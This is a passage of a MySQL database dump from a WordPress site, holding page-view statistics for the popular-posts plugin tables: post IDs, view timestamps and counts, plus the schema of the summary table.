15:15:41',2),(3901,'2021-08-17 15:14:57','2022-08-19 15:51:32',12),(4009,'2021-08-18 07:26:59','2021-08-18 07:26:59',1),(4013,'2021-08-18 12:23:39','2021-08-18 12:23:39',1),(4016,'2021-08-18 12:29:59','2021-08-18 12:29:59',1),(4019,'2021-08-18 11:58:46','2021-08-18 12:01:49',2),(4054,'2021-08-18 11:54:01','2021-08-19 18:34:00',4),(4138,'2021-08-18 17:16:00','2021-08-19 15:15:54',8),(4238,'2021-09-23 11:24:45','2026-01-30 03:07:10',320),(4275,'2021-09-03 19:19:50','2026-01-31 00:51:16',48),(4292,'2021-09-10 11:38:32','2021-09-10 11:39:01',2),(4295,'2021-09-10 11:42:49','2021-09-10 11:44:09',2),(4301,'2021-09-10 11:58:57','2026-02-10 08:05:41',148),(4323,'2021-09-22 16:10:53','2026-01-31 02:50:52',162),(4326,'2021-09-22 16:10:42','2026-02-04 04:24:30',77),(4329,'2021-09-22 16:07:51','2026-02-01 16:59:16',47),(4332,'2021-09-22 16:12:00','2025-12-28 05:41:01',73),(4335,'2021-09-22 16:10:52','2026-02-09 11:33:48',199),(4338,'2021-09-22 16:13:47','2026-01-22 19:15:47',64),(4341,'2021-09-22 16:14:16','2026-02-01 15:55:32',127),(4344,'2021-09-29 12:21:49','2026-01-11 03:34:10',26),(4348,'2021-09-29 20:23:15','2026-01-28 05:26:06',32),(4357,'2021-09-23 11:58:24','2026-02-06 21:15:02',54),(4363,'2021-09-25 09:19:58','2026-02-05 06:13:14',77),(4368,'2021-09-23 16:11:34','2026-01-30 20:08:01',41),(4373,'2021-09-24 10:06:25','2026-02-09 23:12:25',39),(4377,'2021-09-25 11:45:06','2025-12-18 06:10:50',43),(4382,'2021-09-25 15:29:59','2025-12-31 15:59:24',30),(4387,'2021-09-25 08:11:18','2026-01-23 06:05:29',53),(4391,'2021-09-24 10:27:10','2026-02-09 19:18:10',151),(4396,'2021-09-24 10:22:01','2025-12-31 10:53:48',61),(4400,'2021-09-28 16:22:32','2026-02-03 04:43:13',126),(4404,'2021-10-05 17:35:46','2026-02-05 23:33:47',93),(4408,'2021-10-31 14:29:29','2026-01-08 12:38:53',46),(4412,'2021-10-19 08:37:49','2026-01-13 08:52:27',372),(4416,'2021-10-04 17:53:57','2026-02-09 11:17:34',189),(4420,'2021-09-28 23:51:13','2026-01-26 18:40:37',222),(4424,'2021-10-04 05:32:21','2025-12-05 00:19:13',82),(4428,'2021-10-05 17:51:19','2026-02-08 21:35:41',83),(4432,'2021-10-04 05:26:30','2026-01-12 06:07:59',66),(4436,'2021-10-04 21:47:17','2026-02-02 04:26:17',142),(4440,'2021-10-05 23:21:51','2026-02-09 18:00:43',61),(4444,'2021-10-04 20:58:49','2026-01-12 00:47:27',71),(4448,'2021-10-04 05:26:08','2026-02-01 21:37:13',154),(4454,'2021-10-18 11:40:23','2026-01-29 07:10:25',83),(4457,'2021-10-18 11:57:01','2026-02-10 07:16:28',443),(4485,'2021-12-02 15:02:30','2026-01-26 12:46:57',124),(4489,'2021-12-06 15:25:50','2026-01-28 06:49:59',20),(4492,'2021-12-02 15:00:29','2026-01-29 16:31:09',75),(4494,'2021-12-02 14:59:33','2026-01-16 08:35:38',27),(4496,'2021-12-02 14:41:41','2026-02-10 19:25:51',36),(4498,'2021-12-23 20:44:18','2025-12-31 02:35:39',42),(4508,'2021-12-23 20:43:53','2025-12-08 14:01:38',21),(4510,'2021-12-23 20:44:19','2026-01-18 12:55:00',18),(4514,'2021-12-16 16:15:50','2026-01-28 21:20:06',95),(4517,'2021-12-16 11:51:02','2025-12-31 02:24:49',91),(4520,'2021-12-16 12:57:29','2026-02-09 10:44:06',358),(4524,'2021-12-17 11:16:57','2026-02-10 17:05:00',191),(4529,'2021-12-17 11:37:24','2026-02-10 06:13:15',212),(4536,'2022-01-04 07:54:52','2022-01-04 07:55:42',2),(4542,'2022-01-04 09:31:47','2026-02-07 05:40:15',143),(4546,'2022-01-16 16:52:59','2025-12-29 02:42:22',41),(4551,'2022-01-13 12:21:28','2026-02-03 16:24:21',79),(4556,'2022-01-14 12:38:34','2026-02-07 12:14:32',153),(4561,'2022-01-26 04:01:31','2025-12-08 20:54:21',21),(4566,'2022-02-08 13:50:58','2026-01-09 23:34:45',133),(4569,'2022-02-08 17:29:56','2026-01-13 01:09:19',22),(4573,'2022-02-08 17:28:39','2025-12-26 04:31:49',23),(4576,'2022-02-08 17:28:38','2026-02-04 09:52:53',34),(4582,'2022-02-25 16:37:35','2026-01-02 04:09:30',114),(4587,'2022-03-21 01:00:55','2026-02-03 15:27:24',96),(4591,'2022-03-20 00:56:45','2025-12-28 12:02:20',39),(4608,'2022-04-20 09:06:23','2026-02-05 06:24:24',151),(4612,'2022-04-20 09:04:54','2026-02-10 14:22:23',214),(4618,'2022-04-21 14:26:03','2026-01-05 00:28:13',35),(4622,'2022-04-21 14:26:45','2026-02-09 00:30:03',74),(4627,'2022-04-22 16:07:20','2025-12-24 00:47:28',19),(4635,'2022-04-22 16:07:05','2026-01-09 12:42:32',20),(4637,'2022-04-22 16:06:48','2026-02-08 11:15:02',30),(4639,'2022-04-22 16:06:26','2025-12-26 16:48:14',24),(4642,'2022-04-22 16:06:00','2025-12-08 20:47:40',34),(4645,'2022-04-27 11:46:52','2026-02-10 08:03:32',61),(4648,'2022-04-27 11:47:00','2025-12-25 03:46:41',68),(4651,'2022-04-27 11:47:20','2025-12-15 02:09:34',67),(4654,'2022-04-27 11:47:36','2026-02-06 02:50:31',93),(4657,'2022-04-27 11:48:04','2025-12-31 02:58:58',108),(4660,'2022-04-27 11:50:21','2026-02-04 23:13:00',137),(4663,'2022-04-27 12:46:49','2026-01-16 05:42:36',62),(4668,'2022-05-09 11:27:30','2026-01-08 13:24:36',48),(4674,'2022-05-09 12:24:26','2026-01-22 12:05:20',80),(4677,'2022-05-09 12:26:23','2025-12-31 02:39:43',55),(4681,'2022-05-09 12:24:48','2026-01-29 01:27:35',105),(4685,'2022-05-09 12:24:25','2026-01-07 20:59:18',62),(4688,'2022-05-09 12:27:16','2026-02-02 20:24:49',56),(4691,'2022-05-09 12:25:01','2026-02-06 15:59:36',74),(4694,'2022-05-09 12:24:36','2025-12-19 04:34:01',86),(4697,'2022-05-09 13:33:23','2026-01-01 10:53:42',55),(4700,'2022-05-09 16:30:41','2025-12-12 07:35:19',66),(4703,'2022-05-09 16:30:48','2025-12-27 02:42:15',130),(4706,'2022-05-09 16:31:41','2025-11-02 22:32:25',62),(4709,'2022-05-09 16:30:33','2026-02-03 17:33:58',82),(4712,'2022-05-09 16:31:36','2026-02-04 08:13:55',103),(4717,'2022-05-31 03:56:00','2025-12-04 10:07:34',19),(4719,'2022-05-20 10:29:56','2026-02-07 13:52:59',43),(4722,'2022-05-19 15:16:33','2026-02-09 22:52:47',82),(4729,'2022-05-31 03:56:23','2026-01-07 10:34:57',22),(4733,'2022-05-31 03:57:45','2025-11-24 05:15:24',19),(4738,'2022-06-22 09:44:24','2025-12-27 09:56:16',217),(4741,'2022-06-22 11:13:16','2026-01-08 16:43:27',49),(4744,'2022-06-22 11:13:48','2026-02-05 05:29:21',65),(4747,'2022-06-22 11:12:37','2026-01-11 20:49:36',82),(4750,'2022-06-22 11:12:34','2026-01-12 07:15:07',61),(4753,'2022-06-22 11:12:52','2026-02-07 13:45:16',100),(4756,'2022-06-22 11:12:49','2025-12-23 23:54:39',68),(4759,'2022-06-22 11:13:20','2026-02-04 19:58:36',147),(4762,'2022-06-22 12:19:16','2026-01-13 03:23:01',111),(4765,'2022-06-22 12:18:26','2025-12-08 20:58:12',69),(4768,'2022-06-22 12:18:47','2025-12-28 08:33:14',95),(4771,'2022-06-22 12:18:40','2026-01-16 10:40:38',73),(4776,'2022-07-08 15:39:03','2026-01-18 19:03:34',122),(4779,'2022-07-15 15:18:47','2025-12-31 03:31:42',26),(4785,'2022-07-24 10:39:33','2026-02-01 11:39:32',52),(4792,'2022-08-02 14:46:50','2025-12-31 02:06:57',25),(4797,'2022-08-03 17:11:10','2025-12-28 06:03:06',30),(4802,'2022-08-03 17:12:42','2026-01-30 01:56:09',44),(4827,'2022-08-02 20:22:01','2026-02-01 00:46:54',231),(4830,'2022-08-02 20:24:54','2025-12-30 18:16:48',54),(4832,'2022-08-02 20:25:20','2026-02-08 07:33:10',26),(4835,'2022-08-02 20:26:02','2026-01-15 14:33:49',37),(4837,'2022-08-02 20:26:44','2025-12-31 03:46:57',50),(4840,'2022-08-02 20:27:36','2026-02-09 17:04:52',43),(4842,'2022-08-02 20:28:11','2025-12-08 21:14:05',60),(4845,'2022-08-02 20:28:39','2026-02-10 15:19:33',137),(4858,'2022-08-21 19:24:41','2026-02-06 12:21:20',21),(4862,'2022-08-21 03:10:16','2026-02-01 00:46:37',28),(4866,'2022-08-29 23:58:59','2026-01-01 22:24:45',41),(4870,'2022-08-21 05:21:30','2026-02-03 05:15:21',48),(4874,'2022-08-10 16:07:05','2026-02-08 17:49:13',62),(4878,'2022-09-22 21:53:03','2026-02-05 15:37:36',46),(4883,'2022-08-28 09:21:49','2026-02-09 12:26:18',29),(4888,'2022-08-21 07:59:54','2025-12-31 13:44:42',45),(4893,'2022-08-21 19:22:22','2026-01-12 00:35:17',51),(4897,'2022-08-21 03:52:16','2026-01-12 02:48:03',30),(4911,'2022-08-19 15:12:12','2026-02-04 04:53:12',814),(4930,'2022-08-19 15:58:46','2026-02-03 13:12:34',300),(4938,'2022-08-22 10:36:40','2026-02-01 06:42:22',235),(4941,'2022-08-22 10:36:27','2026-02-08 04:34:58',60),(4944,'2022-08-25 20:33:53','2026-02-10 00:22:58',326),(4950,'2022-08-25 16:52:53','2026-02-10 15:29:30',685),(4960,'2022-08-26 00:23:04','2026-02-10 09:29:25',610),(4963,'2022-08-24 19:19:35','2026-02-10 00:06:40',356),(4966,'2022-08-24 15:48:10','2026-02-09 22:07:55',478),(4971,'2022-08-25 11:39:48','2026-01-19 20:47:04',27),(4976,'2022-08-27 03:34:50','2026-01-23 14:30:08',79),(4977,'2022-08-27 12:14:16','2026-02-07 16:30:32',178),(4980,'2022-08-27 03:16:02','2026-02-06 04:28:13',124),(4983,'2022-08-27 02:34:05','2026-02-10 17:17:54',135),(4988,'2022-08-29 18:27:34','2025-12-24 03:00:30',65),(4996,'2022-09-07 16:35:55','2025-12-31 01:04:40',57),(5001,'2022-09-12 16:04:36','2026-01-28 05:26:07',43),(5005,'2022-09-13 09:51:12','2026-01-18 04:10:53',360),(5020,'2022-09-19 07:36:57','2026-02-02 16:51:31',26),(5024,'2022-09-19 05:24:41','2026-01-27 23:37:45',41),(5028,'2022-09-16 01:39:55','2026-01-27 23:37:49',52),(5033,'2022-09-16 01:57:35','2026-02-08 23:39:10',38),(5037,'2022-09-18 03:00:54','2026-02-07 19:53:50',60),(5042,'2022-09-22 23:31:13','2026-01-21 00:08:31',42),(5046,'2022-09-17 16:17:29','2026-01-29 09:38:47',33),(5050,'2022-09-18 18:04:31','2026-02-08 19:38:37',31),(5054,'2022-09-17 06:25:15','2026-02-01 16:42:33',47),(5058,'2022-09-23 12:47:01','2025-12-07 23:09:52',51),(5062,'2022-09-18 17:08:55','2026-02-06 00:21:33',143),(5067,'2022-09-17 03:42:09','2026-01-28 04:34:16',68),(5071,'2022-09-17 20:34:39','2026-02-08 17:44:52',98),(5076,'2022-09-19 12:33:28','2026-01-30 19:31:36',49),(5080,'2022-09-19 08:34:15','2026-02-10 06:02:38',119),(5101,'2022-09-20 11:42:13','2026-01-24 10:00:59',60),(5106,'2022-09-21 14:52:42','2022-09-21 14:52:42',1),(5109,'2022-09-21 14:50:48','2026-01-22 06:06:59',29),(5113,'2022-09-21 16:16:06','2025-12-17 03:30:45',19),(5116,'2022-09-21 16:16:35','2026-01-28 05:26:09',34),(5119,'2022-09-21 16:16:56','2026-02-01 15:27:16',23),(5122,'2022-09-23 12:03:12','2026-01-23 14:38:26',110),(5125,'2022-09-23 12:01:14','2026-02-10 01:28:00',110),(5128,'2022-09-23 12:56:18','2026-01-27 05:30:02',106),(5131,'2022-09-23 12:56:56','2026-01-28 08:50:04',71),(5134,'2022-09-23 12:58:15','2026-02-10 03:00:39',53),(5137,'2022-09-23 12:57:21','2026-02-02 19:32:50',54),(5140,'2022-09-28 22:04:07','2026-01-18 01:06:59',101),(5146,'2022-10-12 19:32:32','2026-02-08 12:13:14',70),(5153,'2022-11-22 08:43:08','2026-01-18 01:06:27',46),(5157,'2022-10-20 16:08:38','2026-02-03 08:10:08',87),(5163,'2022-10-12 16:25:18','2026-02-05 07:54:38',581),(5248,'2022-12-15 04:12:51','2026-02-01 01:24:03',49),(5253,'2023-01-19 01:42:33','2026-02-06 14:04:22',65),(5256,'2023-01-19 17:04:00','2026-02-10 07:50:35',100),(5259,'2023-01-26 23:55:57','2026-02-03 00:55:19',89),(5264,'2023-02-10 15:07:15','2026-02-09 05:21:29',70),(5268,'2023-01-25 03:40:15','2026-02-10 04:08:28',65),(5271,'2023-02-01 10:23:42','2025-12-20 18:51:02',77),(5276,'2023-02-09 11:44:19','2026-02-10 03:56:41',92),(5280,'2023-02-21 10:14:47','2026-01-29 11:13:10',128),(5289,'2023-03-22 12:10:28','2026-01-28 21:34:03',64),(5292,'2023-03-22 12:10:33','2026-02-02 13:40:25',67),(5295,'2023-03-22 12:11:19','2026-01-17 17:36:03',57),(5298,'2023-03-22 12:10:34','2026-02-10 02:11:12',33),(5301,'2023-03-23 11:37:35','2026-01-09 02:59:29',37),(5304,'2023-03-23 11:37:15','2026-02-04 17:11:28',61),(5307,'2023-03-23 11:38:07','2026-02-01 15:36:51',64),(5310,'2023-03-23 11:37:18','2026-02-02 01:25:53',46),(5314,'2023-03-29 10:37:34','2026-01-06 15:22:12',50),(5317,'2023-03-29 12:27:33','2026-01-15 08:34:18',50),(5320,'2023-03-29 12:27:36','2026-01-01 22:04:12',92),(5323,'2023-03-29 12:27:22','2026-01-31 19:25:39',72),(5326,'2023-03-31 16:34:41','2026-01-31 00:54:05',27),(5330,'2023-03-31 15:00:46','2026-01-18 01:05:47',24),(5334,'2023-03-30 11:11:56','2026-02-01 07:54:58',89),(5337,'2023-04-05 12:44:34','2026-01-18 19:44:59',21),(5343,'2023-04-05 12:43:09','2026-02-04 11:25:46',28),(5346,'2023-04-05 12:54:38','2025-12-30 23:02:06',40),(5353,'2023-05-22 13:09:58','2026-02-10 13:35:03',47),(5356,'2023-05-22 13:10:20','2026-02-10 03:56:46',71),(5359,'2023-05-22 13:10:03','2025-12-31 16:05:00',39),(5363,'2023-07-03 16:50:29','2026-02-03 21:31:02',49),(5371,'2023-08-14 11:17:05','2025-12-28 10:34:40',21),(5374,'2023-09-13 21:40:37','2026-01-18 01:06:11',24),(5378,'2023-09-14 20:07:42','2026-01-18 01:04:44',22),(5383,'2025-05-11 10:34:46','2026-01-31 02:02:53',17),(5397,'2025-05-08 04:41:42','2026-02-10 09:55:11',178),(5400,'2025-05-08 04:48:05','2026-02-04 12:02:44',110),(5406,'2025-05-12 15:25:20','2026-02-08 09:40:22',133),(5409,'2025-05-12 15:41:10','2026-02-09 21:53:39',122),(5412,'2025-06-13 16:30:10','2026-02-07 18:11:48',75),(5415,'2025-05-15 00:43:11','2026-02-06 14:09:27',87),(5420,'2025-05-21 04:30:24','2026-02-01 15:13:11',97),(5421,'2025-05-19 13:08:59','2026-01-06 00:21:17',22),(5425,'2025-05-21 01:37:19','2026-02-04 06:11:09',85),(5428,'2025-05-20 19:37:36','2026-02-06 01:26:05',120),(5433,'2025-05-22 22:11:45','2026-02-10 03:00:10',97),(5436,'2025-05-27 06:34:04','2026-02-08 15:37:02',83),(5441,'2025-06-02 11:43:09','2026-02-09 12:15:07',102),(5449,'2025-06-17 11:49:33','2026-02-04 21:56:06',94),(5454,'2025-06-19 12:24:12','2026-02-04 13:18:49',133),(5457,'2025-06-24 06:50:01','2026-02-10 14:47:25',99),(5461,'2025-06-24 14:23:46','2026-02-07 13:04:13',111),(5464,'2025-06-24 18:24:49','2026-01-30 01:03:28',103),(5467,'2025-06-25 07:27:30','2026-01-26 12:44:25',54),(5472,'2025-06-25 07:49:37','2026-02-07 03:14:05',35),(5476,'2025-06-25 09:02:12','2025-12-08 11:36:15',24),(5484,'2025-06-26 11:15:23','2026-01-08 02:25:10',32),(5489,'2025-06-27 11:51:50','2026-02-10 11:06:36',84),(5492,'2025-07-04 06:53:52','2026-01-29 19:13:32',94),(5495,'2025-07-08 10:02:27','2026-01-18 01:22:55',33),(5499,'2025-07-08 17:31:17','2026-01-17 01:33:31',22),(5502,'2025-07-09 21:38:54','2026-02-06 01:33:14',106),(5507,'2025-07-11 15:23:33','2026-01-24 15:15:13',27),(5512,'2025-07-16 23:54:49','2026-01-29 17:37:33',114),(5515,'2025-07-16 23:54:53','2026-02-10 04:49:56',81),(5518,'2025-07-21 17:59:03','2026-01-22 09:08:44',21),(5522,'2025-07-22 13:34:43','2026-02-09 14:38:42',60),(5526,'2025-07-22 09:46:49','2026-01-17 18:19:30',34),(5530,'2025-07-22 09:42:13','2026-02-05 11:52:08',26),(5536,'2025-07-31 21:12:51','2025-12-24 06:49:13',18),(5539,'2025-07-31 21:12:50','2026-02-01 08:29:57',21),(5545,'2025-08-03 21:28:45','2026-01-31 18:25:42',21),(5549,'2025-08-03 21:30:41','2026-01-24 12:04:22',42),(5553,'2025-08-04 16:58:31','2026-02-05 14:28:25',30),(5557,'2025-08-05 20:17:46','2026-01-11 21:59:34',18),(5561,'2025-08-06 22:06:09','2026-01-31 06:33:46',75),(5567,'2025-08-11 08:17:06','2026-02-10 08:29:58',114),(5570,'2025-08-13 16:16:22','2026-02-04 01:58:24',83),(5573,'2025-08-14 14:28:10','2026-01-29 09:27:12',49),(5578,'2025-08-16 22:35:14','2026-01-30 00:18:58',86),(5582,'2025-08-20 10:29:04','2026-01-23 14:37:55',28),(5585,'2025-08-20 10:31:13','2026-01-18 01:04:20',29),(5588,'2025-08-20 05:24:48','2026-02-09 11:30:42',20),(5593,'2025-08-27 23:29:46','2026-02-06 13:41:18',66),(5598,'2025-08-29 14:44:59','2026-02-08 22:29:56',44),(5601,'2025-08-29 16:17:51','2026-02-10 08:18:34',27),(5605,'2025-09-01 15:14:27','2026-02-10 07:32:39',36),(5609,'2025-10-23 15:01:47','2026-02-01 18:41:38',23),(5614,'2025-10-27 10:28:51','2026-01-27 15:46:59',13),(5618,'2025-10-27 11:10:44','2026-01-27 02:24:58',12),(5622,'2025-10-27 11:09:47','2026-01-27 14:01:33',15),(5626,'2025-10-31 17:04:32','2026-02-04 05:06:59',54),(5631,'2025-11-11 19:05:47','2026-02-09 23:33:02',83),(5636,'2025-11-26 22:25:33','2026-02-10 00:07:44',15),(5639,'2025-12-01 14:25:44','2026-02-01 22:05:08',539),(5643,'2025-12-01 14:36:04','2026-01-27 11:21:10',26),(5649,'2025-12-03 13:10:51','2026-02-06 15:22:05',53),(5653,'2025-12-03 15:03:00','2026-01-18 01:01:44',16),(5657,'2025-12-03 14:09:31','2026-01-27 04:12:04',49),(5662,'2025-12-03 14:12:24','2026-02-01 09:43:09',15),(5666,'2025-12-08 10:06:00','2026-02-04 17:10:31',45),(5674,'2025-12-08 10:50:33','2026-02-08 03:03:34',23),(5682,'2025-12-11 19:23:13','2026-02-10 13:30:57',50),(5683,'2025-12-11 18:50:11','2026-02-01 18:24:03',8),(5692,'2026-01-06 12:00:08','2026-02-05 17:23:58',60),(5696,'2026-01-07 23:10:20','2026-02-08 17:37:01',9),(5700,'2026-01-19 19:11:57','2026-02-04 22:17:13',8),(5703,'2026-01-19 23:09:41','2026-02-07 10:47:44',7),(5708,'2026-01-20 11:58:52','2026-01-31 01:29:25',23),(5712,'2026-01-21 09:19:17','2026-02-10 11:52:28',1410),(5717,'2026-01-26 19:31:45','2026-01-31 07:46:02',21),(5721,'2026-01-26 20:08:38','2026-02-08 12:32:36',35),(5725,'2026-01-26 21:38:17','2026-02-05 13:09:02',27),(5730,'2026-01-27 08:07:17','2026-02-09 18:23:02',31),(5735,'2026-01-26 21:04:10','2026-02-02 12:24:10',9),(5738,'2026-01-26 21:04:02','2026-02-01 15:19:11',6),(5741,'2026-01-27 08:10:13','2026-02-07 18:29:42',32),(5745,'2026-01-27 08:30:16','2026-02-10 12:26:54',14),(5749,'2026-01-27 08:35:43','2026-02-07 23:23:56',27),(5753,'2026-01-27 09:47:19','2026-02-10 09:43:57',21),(5757,'2026-01-27 09:52:17','2026-02-08 19:21:00',37),(5761,'2026-01-28 14:40:44','2026-02-01 18:27:38',5),(5762,'2026-01-28 14:31:22','2026-02-09 22:20:54',7),(5769,'2026-02-04 01:27:00','2026-02-04 02:23:35',3),(5771,'2026-02-05 22:44:54','2026-02-09 13:55:30',15),(5778,'2026-02-10 14:04:12','2026-02-10 19:15:59',6);
/*!40000 ALTER TABLE `wp_popularpostsdata` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_popularpostssummary`
--

DROP TABLE IF EXISTS `wp_popularpostssummary`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_popularpostssummary` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `postid` bigint(20) NOT NULL,
  `pageviews` bigint(20) NOT NULL DEFAULT '1',
  `view_date` date NOT NULL,
  `view_datetime` datetime NOT NULL,
  PRIMARY KEY (`ID`),
  KEY `postid` (`postid`),
  KEY `view_date` (`view_date`),
  KEY `view_datetime` (`view_datetime`)
) ENGINE=InnoDB AUTO_INCREMENT=105707 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_popularpostssummary`
--

LOCK TABLES `wp_popularpostssummary` WRITE;
/*!40000 ALTER TABLE `wp_popularpostssummary` DISABLE KEYS */;
INSERT INTO `wp_popularpostssummary` VALUES (1,1937,1,'2019-11-27','2019-11-27 01:41:14'),(2,2813,1,'2019-11-27','2019-11-27 01:45:04'),(3,2809,1,'2019-11-27','2019-11-27 01:53:09'),(4,2801,1,'2019-11-27','2019-11-27 01:53:18'),(5,2813,1,'2019-11-27','2019-11-27 01:54:07'),(6,91,1,'2019-11-27','2019-11-27 01:55:03'),(7,1745,1,'2019-11-27','2019-11-27 01:55:13'),(8,2297,1,'2019-11-27','2019-11-27 01:55:37'),(9,2751,1,'2019-11-27','2019-11-27 01:55:47'),(10,2813,1,'2019-11-27','2019-11-27 01:56:08'),(11,2751,1,'2019-11-27','2019-11-27 02:02:07'),(12,2751,1,'2019-11-27','2019-11-27 02:03:08'),(13,2751,1,'2019-11-27','2019-11-27 02:05:59'),(14,76,1,'2019-11-27','2019-11-27 02:07:53'),(15,76,1,'2019-11-27','2019-11-27 02:08:38'),(16,76,1,'2019-11-27','2019-11-27 02:15:47'),(17,87,1,'2019-11-27','2019-11-27 02:16:23'),(18,74,1,'2019-11-27','2019-11-27 02:17:55'),(19,74,1,'2019-11-27','2019-11-27 02:21:36'),(20,1937,1,'2019-11-27','2019-11-27 03:07:52'),(21,1937,1,'2019-11-27','2019-11-27 03:08:31'),(22,1937,1,'2019-11-27','2019-11-27 05:38:21'),(23,1937,1,'2019-11-27','2019-11-27 05:56:33'),(24,1937,1,'2019-11-27','2019-11-27 06:39:44'),(25,1937,1,'2019-11-27','2019-11-27 08:08:13'),(26,84,1,'2019-11-27','2019-11-27 09:51:39'),(27,1937,1,'2019-11-27','2019-11-27 10:38:48'),(28,74,1,'2019-11-27','2019-11-27 10:40:36'),(29,1937,1,'2019-11-27','2019-11-27 10:55:03'),(30,74,1,'2019-11-27','2019-11-27 11:10:49'),(31,1937,1,'2019-11-27','2019-11-27 11:38:36'),(32,1937,1,'2019-11-27','2019-11-27 12:23:12'),(33,1937,1,'2019-11-27','2019-11-27 13:08:41'),(34,68,1,'2019-11-27','2019-11-27 13:21:40'),(35,91,1,'2019-11-27','2019-11-27 13:24:58'),(36,91,1,'2019-11-27','2019-11-27 13:25:14'),(37,91,1,'2019-11-27','2019-11-27 13:25:50'),(38,91,1,'2019-11-27','2019-11-27 13:31:28'),(39,1937,1,'2019-11-27','2019-11-27 13:32:13'),(40,1937,1,'2019-11-27','2019-11-27 13:39:26'),(41,1937,1,'2019-11-27','2019-11-27 14:03:33'),(42,1937,1,'2019-11-27','2019-11-27 14:05:20'),(43,1937,1,'2019-11-27','2019-11-27 15:06:29'),(44,1937,1,'2019-11-27','2019-11-27 15:38:11'),(45,1937,1,'2019-11-27','2019-11-27 16:38:51'),(46,1937,1,'2019-11-27','2019-11-27 17:03:26'),(47,1937,1,'2019-11-27','2019-11-27 18:08:30'),(48,1937,1,'2019-11-27','2019-11-27 19:49:22'),(49,74,1,'2019-11-27','2019-11-27 20:08:11'),(50,2624,1,'2019-11-27','2019-11-27 20:11:46'),(51,30,1,'2019-11-27','2019-11-27 20:12:53'),(52,30,1,'2019-11-27','2019-11-27 20:15:22'),(53,1937,1,'2019-11-27','2019-11-27 20:38:10'),(54,84,1,'2019-11-27','2019-11-27 20:53:05'),(55,84,1,'2019-11-27','2019-11-27 20:53:55'),(56,1937,1,'2019-11-27','2019-11-27 21:36:48'),(57,1937,1,'2019-11-27','2019-11-27 22:04:58'),(58,68,1,'2019-11-27','2019-11-27 22:16:26'),(59,74,1,'2019-11-27','2019-11-27 22:32:26'),(60,1937,1,'2019-11-27','2019-11-27 23:08:31'),(61,74,1,'2019-11-28','2019-11-28 00:25:16'),(62,74,1,'2019-11-28','2019-11-28 00:25:46'),(67,80,1,'2019-11-28','2019-11-28 00:55:49'),(68,80,1,'2019-11-28','2019-11-28 00:56:01'),(69,80,1,'2019-11-28','2019-11-28 00:57:51'),(70,80,1,'2019-11-28','2019-11-28 00:59:11'),(71,80,1,'2019-11-28','2019-11-28 01:00:16'),(72,89,1,'2019-11-28','2019-11-28 01:05:59'),(73,1582,1,'2019-11-28','2019-11-28 01:06:31'),(74,2801,1,'2019-11-28','2019-11-28 01:07:22'),(75,2801,1,'2019-11-28','2019-11-28 01:09:28'),(76,2801,1,'2019-11-28','2019-11-28 01:11:55'),(77,2809,1,'2019-11-28','2019-11-28 01:12:52'),(78,87,1,'2019-11-28','2019-11-28 01:13:05'),(79,473,1,'2019-11-28','2019-11-28 01:13:13'),(80,473,1,'2019-11-28','2019-11-28 01:14:24'),(81,473,1,'2019-11-28','2019-11-28 01:16:44'),(82,2801,1,'2019-11-28','2019-11-28 01:17:11'),(83,80,1,'2019-11-28','2019-11-28 01:30:33'),(84,80,1,'2019-11-28','2019-11-28 01:31:11'),(85,80,1,'2019-11-28','2019-11-28 01:32:11'),(86,80,1,'2019-11-28','2019-11-28 01:37:35'),(87,1937,1,'2019-11-28','2019-11-28 01:38:24'),(88,80,1,'2019-11-28','2019-11-28 01:41:30'),(89,2395,1,'2019-11-28','2019-11-28 01:51:06'),(90,2410,1,'2019-11-28','2019-11-28 01:52:53'),(91,2411,1,'2019-11-28','2019-11-28 01:53:44'),(92,2419,1,'2019-11-28','2019-11-28 01:55:30'),(93,2420,1,'2019-11-28','2019-11-28 01:57:16'),(94,80,1,'2019-11-28','2019-11-28 01:59:22'),(95,80,1,'2019-11-28','2019-11-28 02:00:16'),(96,80,1,'2019-11-28','2019-11-28 02:01:02'),(97,80,1,'2019-11-28','2019-11-28 02:01:16'),(98,80,1,'2019-11-28','2019-11-28 02:01:55'),(99,80,1,'2019-11-28','2019-11-28 02:02:52'),(100,80,1,'2019-11-28','2019-11-28 02:05:06'),(101,80,1,'2019-11-28','2019-11-28 02:06:02'),(102,2503,1,'2019-11-28','2019-11-28 02:07:52'),(103,1937,1,'2019-11-28','2019-11-28 02:34:18'),(104,80,1,'2019-11-28','2019-11-28 02:58:13'),(105,2503,1,'2019-11-28','2019-11-28 02:59:33'),(106,1937,1,'2019-11-28','2019-11-28 03:06:17'),(107,74,1,'2019-11-28','2019-11-28 03:18:29'),(108,1937,1,'2019-11-28','2019-11-28 03:53:59'),(109,1937,1,'2019-11-28','2019-11-28 04:08:31'),(110,1937,1,'2019-11-28','2019-11-28 06:44:53'),(111,1937,1,'2019-11-28','2019-11-28 07:31:06'),(112,1937,1,'2019-11-28','2019-11-28 08:07:39'),(113,1937,1,'2019-11-28','2019-11-28 09:02:12'),(114,1937,1,'2019-11-28','2019-11-28 09:16:51'),(115,1937,1,'2019-11-28','2019-11-28 10:44:44'),(116,2297,1,'2019-11-28','2019-11-28 11:00:18'),(117,74,1,'2019-11-28','2019-11-28 11:01:09'),(118,80,1,'2019-11-28','2019-11-28 11:04:35'),(119,1937,1,'2019-11-28','2019-11-28 11:08:49'),(120,1937,1,'2019-11-28','2019-11-28 11:39:52'),(121,1937,1,'2019-11-28','2019-11-28 12:29:50'),(122,1937,1,'2019-11-28','2019-11-28 13:09:27'),(123,1937,1,'2019-11-28','2019-11-28 14:49:22'),(124,1937,1,'2019-11-28','2019-11-28 14:49:34'),(125,1937,1,'2019-11-28','2019-11-28 15:04:21'),(126,1937,1,'2019-11-28','2019-11-28 15:04:53'),(127,89,1,'2019-11-28','2019-11-28 15:06:43'),(128,1590,1,'2019-11-28','2019-11-28 15:07:08'),(129,89,1,'2019-11-28','2019-11-28 15:07:27'),(130,1937,1,'2019-11-28','2019-11-28 15:40:30'),(131,1937,1,'2019-11-28','2019-11-28 16:07:00'),(132,1937,1,'2019-11-28','2019-11-28 17:29:54'),(133,1937,1,'2019-11-28','2019-11-28 18:10:49'),(134,1937,1,'2019-11-28','2019-11-28 21:02:36'),(135,1937,1,'2019-11-28','2019-11-28 22:27:42'),(136,1937,1,'2019-11-28','2019-11-28 23:09:37'),(137,1937,1,'2019-11-29','2019-11-29 